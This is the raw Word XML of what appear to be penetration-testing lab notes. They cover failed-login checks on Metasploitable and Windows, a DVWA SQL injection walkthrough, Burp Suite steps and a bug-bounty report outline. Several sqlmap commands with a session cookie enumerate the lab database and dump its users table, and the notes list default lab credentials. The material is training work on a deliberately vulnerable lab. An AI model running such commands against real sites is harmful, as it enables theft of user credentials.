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741F" w14:textId="70250553" w:rsidR="003F0115" w:rsidRDefault="00BB15D4">
      <w:r w:rsidRPr="00BB15D4">
        <w:t>​​apt-get update &amp;&amp; apt-get upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E58855" w14:textId="77777777" w:rsidR="00BB15D4" w:rsidRDefault="00BB15D4"/>
    <w:p w14:paraId="09C8EC97" w14:textId="6EE2109D" w:rsidR="004146C8" w:rsidRPr="004146C8" w:rsidRDefault="004146C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004146C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004146C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546D86D" w14:textId="01E3F7A9" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CC7B5E1" w14:textId="14493CFF" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:r>
        <w:t xml:space="preserve">Pass: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D775D97" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8" w:rsidP="004146C8">
      <w:r>
        <w:t>To check the Failed Login attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E5382" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8" w:rsidP="004146C8">
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E65A33" w14:textId="77777777" w:rsidR="004146C8" w:rsidRPr="003B408E" w:rsidRDefault="004146C8" w:rsidP="004146C8">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B408E">
        <w:t>tail  /var/log/auth.log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49E272B5" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA82D40" w14:textId="5C8087B1" w:rsidR="004146C8" w:rsidRPr="004146C8" w:rsidRDefault="004146C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004146C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004146C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windowos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004146C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> m/c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038D552" w14:textId="6DBDFDBF" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:r>
        <w:t xml:space="preserve">To see the failed </w:t>
      </w:r>
      <w:r w:rsidR="00A57653">
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">event </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142B982" w14:textId="771517C8" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:r>
        <w:t>Search event viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F2A09" w14:textId="3F9390AA" w:rsidR="004146C8" w:rsidRDefault="004146C8">
      <w:r>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> windows log   </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security </w:t>
      </w:r>
      <w:r w:rsidR="00A57653">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00A57653">
        <w:t xml:space="preserve"> filter </w:t>
      </w:r>
      <w:r w:rsidR="00A57653">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00A57653">
        <w:t xml:space="preserve"> event id 4625 (wrong password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8E999" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="22F0CD94" w14:textId="5F691F37" w:rsidR="00D654F3" w:rsidRPr="00F949CC" w:rsidRDefault="00D654F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F949CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Web Se</w:t>
      </w:r>
      <w:r w:rsidR="00F949CC" w:rsidRPr="00F949CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>curity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C70A3" w14:textId="0F8264F5" w:rsidR="00606F9F" w:rsidRPr="00606F9F" w:rsidRDefault="00606F9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606F9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22736550" w14:textId="0820DD1D" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t>1st step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0FDD1" w14:textId="4B93B736" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00EA746B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.75.129/dvwa/vulnerabilities/sqli/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02A0A760" w14:textId="29B1938A" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00606F9F">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA06331" w14:textId="39792B3E" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t xml:space="preserve">Type id =1 or 2 or 4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>anything and submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD9428" w14:textId="16EA02CE" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t>Step 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31838297" w14:textId="0D2620D5" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t xml:space="preserve">Copy the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> after submitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DF500" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t xml:space="preserve">Like example </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174B417" w14:textId="14D216C7" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00EA746B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26441179" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="07CCE162" w14:textId="7F7FBE6E" w:rsidR="00606F9F" w:rsidRDefault="00CA7C24">
      <w:r>
        <w:t>step 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF0C67" w14:textId="5490783B" w:rsidR="00CA7C24" w:rsidRDefault="00CA7C24">
      <w:r>
        <w:t xml:space="preserve">press f12 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> console </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have to write </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7C24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="432D529B" w14:textId="77777777" w:rsidR="00CA7C24" w:rsidRDefault="00CA7C24"/>
    <w:p w14:paraId="35397E7C" w14:textId="77777777" w:rsidR="00CA7C24" w:rsidRDefault="00CA7C24"/>
    <w:p w14:paraId="5D45E393" w14:textId="77777777" w:rsidR="00CA7C24" w:rsidRDefault="00CA7C24"/>
    <w:p w14:paraId="5A669D1A" w14:textId="77777777" w:rsidR="00CA7C24" w:rsidRDefault="00CA7C24"/>
    <w:p w14:paraId="454415B9" w14:textId="5D387829" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:r>
        <w:t>open kali terminal and paste the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDDC4D" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="13C7DCD2" w14:textId="0D4CF993" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -u "http://192.168.75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=f22c68a1f4464b464132386a1be68ad8" --batch </w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA7C24">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4387B983" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="5EE92E8F" w14:textId="3E48859F" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -u "http://192.168.75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=f22c68a1f4464b464132386a1be68ad8" --batch -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>--tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA10FA2" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="024C0224" w14:textId="7F13A306" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -u "http://192.168.75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=f22c68a1f4464b464132386a1be68ad8" --batch -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -T users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE804A" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="6EDDD61D" w14:textId="78CDD693" w:rsidR="00606F9F" w:rsidRDefault="00606F9F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -u "http://192.168.75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=f22c68a1f4464b464132386a1be68ad8" --batch -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606F9F">
        <w:t xml:space="preserve"> -T users </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00606F9F">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C405C" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="478757B6" w14:textId="77777777" w:rsidR="00606F9F" w:rsidRDefault="00606F9F"/>
    <w:p w14:paraId="5AEE5638" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="1F6AEB0F" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="1A3A7D66" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="249587D5" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="71816160" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="02D93FC7" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="6B30B693" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="1003A569" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="09D1BA42" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="205DC5EF" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="50216878" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="3644ADBD" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="744DFEB1" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="3CFD0FCD" w14:textId="77777777" w:rsidR="00BA4AD6" w:rsidRDefault="00BA4AD6"/>
    <w:p w14:paraId="5A1A5733" w14:textId="66AA3BD9" w:rsidR="00BA4AD6" w:rsidRPr="005834DB" w:rsidRDefault="002A0ED7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005834DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BA4AD6" w:rsidRPr="005834DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ypical Bug Bounty Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588417A9" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7"/>
    <w:p w14:paraId="53C5FA89" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29425E" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3FFDD" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Target Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDBBAE4" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DB577" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Vulnerability Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C475AA4" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186D1933" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C8847" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4E1F6" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Report Submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D6FDC" w14:textId="77777777" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68845B" w14:textId="7DC92E6C" w:rsidR="002A0ED7" w:rsidRDefault="002A0ED7" w:rsidP="002A0ED7">
      <w:r>
        <w:t>Reward / Acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0536B3" w14:textId="77777777" w:rsidR="007C761A" w:rsidRDefault="007C761A" w:rsidP="006B7859">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACA0B7C" w14:textId="3E51AA76" w:rsidR="006B7859" w:rsidRPr="006B7859" w:rsidRDefault="006B7859" w:rsidP="006B7859">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7859">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hands-on Exercise 6: Reporting the Bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142768DE" w14:textId="77777777" w:rsidR="006B7859" w:rsidRPr="006B7859" w:rsidRDefault="006B7859" w:rsidP="006B7859">
      <w:r w:rsidRPr="006B7859">
        <w:t xml:space="preserve">Bug bounty success depends on </w:t>
      </w:r>
      <w:r w:rsidRPr="006B7859">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quality of reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="006B7859">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EED7CD" w14:textId="77777777" w:rsidR="006B7859" w:rsidRPr="006B7859" w:rsidRDefault="006B7859" w:rsidP="006B7859">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7859">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Good Report Includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9B46E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Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EBBB72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Target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82FC4D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Vulnerability type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15E16D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Steps to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175E910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Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AFC2E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Impact assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302943CF" w14:textId="77777777" w:rsidR="006B7859" w:rsidRPr="006B7859" w:rsidRDefault="006B7859" w:rsidP="006B7859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7859">
        <w:t>Suggested fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A388436" w14:textId="77777777" w:rsidR="00C76EC7" w:rsidRDefault="00C76EC7"/>
    <w:p w14:paraId="69CB33E0" w14:textId="77777777" w:rsidR="00E42CFC" w:rsidRPr="00E42CFC" w:rsidRDefault="00E42CFC" w:rsidP="00E42CFC">
      <w:r w:rsidRPr="00E42CFC">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33920732" w14:textId="77777777" w:rsidR="00E42CFC" w:rsidRPr="00E42CFC" w:rsidRDefault="00E42CFC" w:rsidP="00E42CFC">
      <w:r w:rsidRPr="00E42CFC">
        <w:t>Title: Reflected XSS in Search Field</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42CFC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E42CFC">
        <w:br/>
        <w:t>Steps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42CFC">
        <w:br/>
        <w:t>1. Go to search page</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42CFC">
        <w:br/>
        <w:t>2. Enter payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42CFC">
        <w:br/>
        <w:t>3. Alert triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A5B10" w14:textId="3650AF05" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hands-on Exercise: Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4394C" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76EC7">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6F333" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053CB629" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:t>Configure browser proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524F314" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:t>Intercept HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DF1DF" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:t>Modify parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184ED46" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:t>Send to repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F7A9C" w14:textId="77777777" w:rsidR="005834DB" w:rsidRPr="00C76EC7" w:rsidRDefault="005834DB" w:rsidP="005834DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76EC7">
        <w:t>Test vulnerabilities</w:t>
      </w:r>
    </w:p>
